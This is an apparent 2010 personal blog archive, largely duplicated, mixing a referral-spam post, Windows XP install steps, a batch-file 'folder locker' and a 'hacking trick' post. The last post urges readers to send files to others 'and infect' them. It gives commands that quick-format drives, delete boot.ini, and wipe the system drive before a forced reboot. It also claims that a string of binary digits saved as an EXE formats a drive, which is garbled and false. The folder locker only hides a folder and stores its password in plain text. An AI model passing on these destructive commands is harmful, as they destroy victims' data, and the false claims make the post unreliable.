Saturday, December 25, 2010
Wednesday, December 22, 2010
Hi ,
I have something interesting for you - you can easily earn regular income online via PaisaLive.com!
It’s really amazing! You get paid to open & read the contents of PaisaLive mails. You also receive special discount coupons, promotions and free passes to various events in your city.
Join now and get Rs. 99 instantly, just for joining. What more, as a special bonus you get paid for inviting your friends also!
Create your PaisaLive Account & refer your friends to earn launch referral bonus on every new registration.
http://www.PaisaLive.com/register.asp?716658-7838135
PaisaLive - Get Paid to read emails
{Manish Joshi}
Earn upto Rs. 9,000 pm checking Emails. Join now!
I have something interesting for you - you can easily earn regular income online via PaisaLive.com!
It’s really amazing! You get paid to open & read the contents of PaisaLive mails. You also receive special discount coupons, promotions and free passes to various events in your city.
Join now and get Rs. 99 instantly, just for joining. What more, as a special bonus you get paid for inviting your friends also!
Create your PaisaLive Account & refer your friends to earn launch referral bonus on every new registration.
http://www.PaisaLive.com/register.asp?716658-7838135
PaisaLive - Get Paid to read emails
{Manish Joshi}
Earn upto Rs. 9,000 pm checking Emails. Join now!
Sunday, December 12, 2010
Install Windows Xp from Dos
Install Xp From Dos
If XP will not install from the CD or if you have a new drive with no operating system on it yet try these:
Install Windows XP from the hard drive with Windows 98 already installed:
Boot Windows 98
Insert the XP CD into your CD reader
Explore Windows XP through My Computer
Copy i386 folder to C:
Go into C:i386 folder and double click on winnt32.exe to launch the setup from the hard drive
Install Windows XP from DOS (ie. no OS on a new hard drive):
Boot with a Windows 98 Start Up disk
Insert the Windows 98 CD into the CD reader
Run smartdrv.exe from the Win98 directory on the windows 98 CD (file caching)
Type cd.. to back up to the root directory
Insert Windows XP CD into the CD reader
Copy the i386 folder to C:
Go into C:i386 folder on C: and type winnt.exe to launch the setup from the hard drive.
enjoy!!!!!!!!!
If XP will not install from the CD or if you have a new drive with no operating system on it yet try these:
Install Windows XP from the hard drive with Windows 98 already installed:
Boot Windows 98
Insert the XP CD into your CD reader
Explore Windows XP through My Computer
Copy i386 folder to C:
Go into C:i386 folder and double click on winnt32.exe to launch the setup from the hard drive
Install Windows XP from DOS (ie. no OS on a new hard drive):
Boot with a Windows 98 Start Up disk
Insert the Windows 98 CD into the CD reader
Run smartdrv.exe from the Win98 directory on the windows 98 CD (file caching)
Type cd.. to back up to the root directory
Insert Windows XP CD into the CD reader
Copy the i386 folder to C:
Go into C:i386 folder on C: and type winnt.exe to launch the setup from the hard drive.
enjoy!!!!!!!!!
Lock up a folder without using any software
This is a different way to lock up a folder without using any software.
This is not hiding a folder but locking it..using batch file...
What is batch file???
It is this file (command.com) which handles all DOS commands that you
give at the DOS prompt---such as COPY, DIR, DEL etc.
--------code--------
@ECHO OFF
title Folder Hide
if not exist readme_locker.txt goto readme
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Personal goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the 'Personal' folderY/N)
set /p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto exit
if %cho%==N goto exit
echo Invalid choice. Try Again.
goto CONFIRM
:LOCK
ren Personal "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
pause
goto exit
:UNLOCK
echo Enter password to unlock folder
set /p "pass= >"
attrib -h -s "c:\windows\setup.ecr"
set /p oripass= < c:\windows\setup.ecr
attrib +h +s "c:\windows\setup.ecr"
if NOT %pass% == %oripass% goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Personal
echo Folder Unlocked successfully
pause
goto exit
:FAIL
echo Invalid password....
echo If you forgot the password mail me:mani.joshi9305@gmail.com
pause
goto exit
:MDLOCKER
rem echo Enter the name for create a folder to hide:
rem set /p "name= >"
echo Enter the password for hide the 'Personal' folder:
set /p "msg=>"
del "c:\windows\setup.ecr"
cls
echo %msg% >> c:\windows\setup.ecr
attrib +h +s "c:\windows\setup.ecr"
md Personal
echo 'Personal' Folder created successfully ...
echo It is created in the current directory...
pause
goto exit
:readme
echo Readme file created....
echo Follow the procedure according to the readme_locker.txt
echo ================================================>> readme_locker.txt
echo Folderlocker 1.0 (Beta) * README FILE * Nov 22, 2010 Made By: Manish Joshi(Mahi)>> readme_locker.txt
echo =============================================== >> readme_locker.txt
echo CONTENTS: >> readme_locker.txt
echo 1. What is Folderlocker? >> readme_locker.txt
echo 2. Steps >> readme_locker.txt
echo 3. Contacts >> readme_locker.txt
echo 1. What is Folderlocker? >> readme_locker.txt
echo ------------------------ >> readme_locker.txt
echo Folder locker is used for the protect a folder with a password. >>readme_locker.txt
echo 2. Steps >> readme_locker.txt
echo -------- >> readme_locker.txt
echo i.Enter the password for hide the 'Personal' folder >> readme_locker.txt
echo ii.Drag the files into 'Personal' folder to protect >> readme_locker.txt
echo iii.Run the folderlocker.exe again >> readme_locker.txt
echo iv.If you want to lock the folder hit 'y' or 'Y' Without Quotes >> readme_locker.txt
echo vi.If you want to retrieve the folder run the folderlocker.exe again >> readme_locker.txt
echo vii.Give the Correct password >> readme_locker.txt
echo 3. Contacts >> readme_locker.txt
echo ----------- >> readme_locker.txt
echo Yahoo!: >> readme_locker.txt
echo Google: >> readme_locker.txt
echo Note: >> readme_locker.txt
echo ----- >> readme_locker.txt
echo ============================================== >>readme_locker.txt
pause
:exit
--------code--------
Step1) Copy the give code in a note pad and save the note pad in your pc with the name name.bat (that is with the extension of .bat). you can replace the name portion with anything u want. ( In place of password in the code given type your desired password.)
Step 2) A batch file will be created where you hav saved. Now double click on it , it will make a folder with the name locker at the same place where the batch file is save.
Step3) Now add the files you want to be locked in that folder.
Step 4) Double click on the batch file. It will ask for locking the folder formed. Type y(yes). The folder will be locked and hidden.
Step5) To unlock,double click on batch file again and enter the password in the new window opened.
This is not hiding a folder but locking it..using batch file...
What is batch file???
It is this file (command.com) which handles all DOS commands that you
give at the DOS prompt---such as COPY, DIR, DEL etc.
--------code--------
title Folder Hide
if not exist readme_locker.txt goto readme
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Personal goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the 'Personal' folderY/N)
set /p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto exit
if %cho%==N goto exit
echo Invalid choice. Try Again.
goto CONFIRM
:LOCK
ren Personal "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
pause
goto exit
:UNLOCK
echo Enter password to unlock folder
set /p "pass= >"
attrib -h -s "c:\windows\setup.ecr"
set /p oripass= < c:\windows\setup.ecr
attrib +h +s "c:\windows\setup.ecr"
if NOT %pass% == %oripass% goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Personal
echo Folder Unlocked successfully
pause
goto exit
:FAIL
echo Invalid password....
echo If you forgot the password mail me:mani.joshi9305@gmail.com
pause
goto exit
:MDLOCKER
rem echo Enter the name for create a folder to hide:
rem set /p "name= >"
echo Enter the password for hide the 'Personal' folder:
set /p "msg=>"
del "c:\windows\setup.ecr"
cls
echo %msg% >> c:\windows\setup.ecr
attrib +h +s "c:\windows\setup.ecr"
md Personal
echo 'Personal' Folder created successfully ...
echo It is created in the current directory...
pause
goto exit
:readme
echo Readme file created....
echo Follow the procedure according to the readme_locker.txt
echo ================================================>> readme_locker.txt
echo Folderlocker 1.0 (Beta) * README FILE * Nov 22, 2010 Made By: Manish Joshi(Mahi)>> readme_locker.txt
echo =============================================== >> readme_locker.txt
echo CONTENTS: >> readme_locker.txt
echo 1. What is Folderlocker? >> readme_locker.txt
echo 2. Steps >> readme_locker.txt
echo 3. Contacts >> readme_locker.txt
echo 1. What is Folderlocker? >> readme_locker.txt
echo ------------------------ >> readme_locker.txt
echo Folder locker is used for the protect a folder with a password. >>readme_locker.txt
echo 2. Steps >> readme_locker.txt
echo -------- >> readme_locker.txt
echo i.Enter the password for hide the 'Personal' folder >> readme_locker.txt
echo ii.Drag the files into 'Personal' folder to protect >> readme_locker.txt
echo iii.Run the folderlocker.exe again >> readme_locker.txt
echo iv.If you want to lock the folder hit 'y' or 'Y' Without Quotes >> readme_locker.txt
echo vi.If you want to retrieve the folder run the folderlocker.exe again >> readme_locker.txt
echo vii.Give the Correct password >> readme_locker.txt
echo 3. Contacts >> readme_locker.txt
echo ----------- >> readme_locker.txt
echo Yahoo!: >> readme_locker.txt
echo Google: >> readme_locker.txt
echo Note: >> readme_locker.txt
echo ----- >> readme_locker.txt
echo ============================================== >>readme_locker.txt
pause
:exit
--------code--------
Step1) Copy the give code in a note pad and save the note pad in your pc with the name name.bat (that is with the extension of .bat). you can replace the name portion with anything u want. ( In place of password in the code given type your desired password.)
Step 2) A batch file will be created where you hav saved. Now double click on it , it will make a folder with the name locker at the same place where the batch file is save.
Step3) Now add the files you want to be locked in that folder.
Step 4) Double click on the batch file. It will ask for locking the folder formed. Type y(yes). The folder will be locked and hidden.
Step5) To unlock,double click on batch file again and enter the password in the new window opened.
Saturday, December 11, 2010
How to format a HDD using notepad
If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will
show you how to format a HDD using a notepad. This is really works.
Step 1.
Copy The Following In Notepad Exactly as it
Step 2.
Save As An EXE Any Name Will Do
Step 3.
Send the EXE to People And Infect
OR
IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple
binary code
format c: /Q/X — this will format your drive c:
format d: /Q/X — this will format your dirve d:
format a: /Q/X — this will format your drive a:
del /F/S/Q c:boot.ini — this will cause your computer not to boot.
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
save it as Dell.bat
want worse then type the following:
and save it as a .bat file
its really works try it.............
enjoy hacking tricks!!!!!!!!!!!!!!!
show you how to format a HDD using a notepad. This is really works.
Step 1.
Copy The Following In Notepad Exactly as it
says01001011000111110010010101010101010000011111100000
Step 2.
Save As An EXE Any Name Will Do
Step 3.
Send the EXE to People And Infect
OR
IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple
binary code
format c: /Q/X — this will format your drive c:
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d: /Q/X — this will format your dirve d:
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a: /Q/X — this will format your drive a:
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C: *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
its really works try it.............
enjoy hacking tricks!!!!!!!!!!!!!!!
Subscribe to:
Posts (Atom)